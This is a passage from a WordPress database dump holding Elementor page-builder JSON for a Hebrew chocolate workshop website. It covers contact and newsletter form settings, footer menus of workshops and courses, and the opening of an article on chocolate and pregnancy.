\\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(744,157,'_elementor_version','0.4'),(745,157,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(748,152,'_elementor_edit_mode','builder'),(749,160,'_elementor_template_type','single'),(750,160,'_elementor_edit_mode','builder'),(751,160,'_wp_page_template','default'),(752,160,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(753,160,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"e0d5494\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e2\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05e8\\u05d9\\u05d5\\u05df\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"eef1985\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-size: 1rem;\\\">\\u05ea\\u05d5\\u05e6\\u05d0\\u05d5\\u05ea \\u05de\\u05d7\\u05e7\\u05e8 \\u05d7\\u05d3\\u05e9 \\u05e6\\u05e4\\u05d5\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05e7\\u05d1\\u05dc \\u05d1\\u05d1\\u05e8\\u05db\\u05d4 \\u05d7\\u05de\\u05d4 \\u05e2\\u05dc \\u05d9\\u05d3\\u05d9 \\u05d0\\u05de\\u05d4\\u05d5\\u05ea \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3, \\u05d1\\u05d4\\u05ea\\u05d7\\u05e9\\u05d1 \\u05d1\\u05e8\\u05e9\\u05d9\\u05de\\u05d4 \\u05d4\\u05d0\\u05e8\\u05d5\\u05db\\u05d4 \\u05e9\\u05dc \\u05d4\\u05de\\u05d6\\u05d5\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05dd \\u05d4\\u05df \\u05de\\u05ea\\u05d1\\u05e7\\u05e9\\u05d5\\u05ea \\u05dc\\u05d4\\u05d9\\u05de\\u05e0\\u05e2 \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05d4\\u05d4\\u05d9\\u05e8\\u05d9\\u05d5\\u05df. \\u05d1\\u05e2\\u05d5\\u05d3 \\u05e9\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05de\\u05e8\\u05d1\\u05d4 \\u05d4\\u05de\\u05d6\\u05dc, \\u05e0\\u05e2\\u05d3\\u05e8 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d4 \\u05d6\\u05d5, \\u05de\\u05d5\\u05de\\u05dc\\u05e5 \\u05dc\\u05e0\\u05e9\\u05d9\\u05dd \\u05d4\\u05e8\\u05d5\\u05ea \\u05dc\\u05d4\\u05d9\\u05de\\u05e0\\u05e2 \\u05de\\u05e8\\u05db\\u05d9\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e1\\u05e4\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05db\\u05d2\\u05d5\\u05df \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05db\\u05d9\\u05dc\\u05d9\\u05dd \\u05e9\\u05d5\\u05de\\u05df, \\u05e1\\u05d5\\u05db\\u05e8 \\u05d5\\u05e7\\u05e4\\u05d0\\u05d9\\u05df.<\\/span><\\/p><p>\\u05d0\\u05da \\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d9\\u05ea\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05e0\\u05dc\\u05d5\\u05d5\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d9\\u05db\\u05d4 \\u05de\\u05ea\\u05d5\\u05e0\\u05d4 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d5\\u05d0 \\u05de\\u05db\\u05d9\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d8\\u05e2\\u05dd \\u05de\\u05e1\\u05d5\\u05d2 \\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd, \\u05d4\\u05e0\\u05e7\\u05e9\\u05e8\\u05d9\\u05dd \\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05df \\u05de\\u05d5\\u05e4\\u05d7\\u05ea \\u05dc\\u05d1\\u05e2\\u05d9\\u05d5\\u05ea \\u05dc\\u05d1 \\u05d5\\u05db\\u05dc\\u05d9 \\u05d3\\u05dd \\u05d5\\u05db\\u05d5\\u05dc\\u05e1\\u05d8\\u05e8\\u05d5\\u05dc \\u05e0\\u05de\\u05d5\\u05da. \\u05db\\u05db\\u05dc \\u05e9\\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05d4\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05db\\u05da \\u05d4\\u05d5\\u05d0 \\u05de\\u05db\\u05d9\\u05dc \\u05d9\\u05d5\\u05ea\\u05e8 \\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd.<\\/p><p>\\u05d2\\u05dd \\u05de\\u05d7\\u05e7\\u05e8\\u05d9\\u05dd \\u05e7\\u05d5\\u05d3\\u05de\\u05d9\\u05dd \\u05d4\\u05e8\\u05d0\\u05d5 \\u05e9\\u05e6\\u05e8\\u05d9\\u05db\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05ea\\u05d5\\u05e0\\u05d4 \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05d4\\u05d4\\u05d9\\u05e8\\u05d9\\u05d5\\u05df \\u05e2\\u05e9\\u05d5\\u05d9\\u05d4 \\u05dc\\u05d4\\u05d5\\u05e8\\u05d9\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05db\\u05d5\\u05df \\u05dc\\u05e8\\u05e2\\u05dc\\u05ea \\u05d4\\u05e8\\u05d9\\u05d5\\u05df, \\u05de\\u05e6\\u05d1 \\u05d1\\u05d5 \\u05d0\\u05e1\\u05e4\\u05e7\\u05ea \\u05d4\\u05d3\\u05dd \\u05dc\\u05e2\\u05d5\\u05d1\\u05e8 \\u05de\\u05e6\\u05d8\\u05de\\u05e6\\u05de\\u05ea \\u05d1\\u05d2\\u05dc\\u05dc \\u05dc\\u05d7\\u05e5 \\u05d4\\u05d3\\u05dd \\u05d4\\u05d2\\u05d1\\u05d5\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dd.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05e8\\u05d9\\u05d5\\u05df: \\u05d4\\u05de\\u05d7\\u05e7\\u05e8<\\/strong><\\/h2><p>\\u05d4\\u05d7\\u05d5\\u05e7\\u05e8\\u05d9\\u05dd \\u05e2\\u05e7\\u05d1\\u05d5 \\u05d0\\u05d7\\u05e8 129 \\u05e0\\u05e9\\u05d9\\u05dd \\u05d4\\u05e8\\u05d5\\u05ea \\u05e2\\u05dd \\u05d4\\u05e8\\u05d9\\u05d5\\u05df \\u05d9\\u05d7\\u05d9\\u05d3, \\u05e9\\u05e0\\u05de\\u05e6\\u05d0\\u05d5 \\u05d1\\u05d9\\u05df \\u05d4\\u05e9\\u05d1\\u05d5\\u05e2\\u05d5\\u05ea \\u05d4-11-14 \\u05dc\\u05d4\\u05e8\\u05d9\\u05d5\\u05e0\\u05df. \\u05db\\u05dc \\u05d4\\u05e0\\u05e9\\u05d9\\u05dd 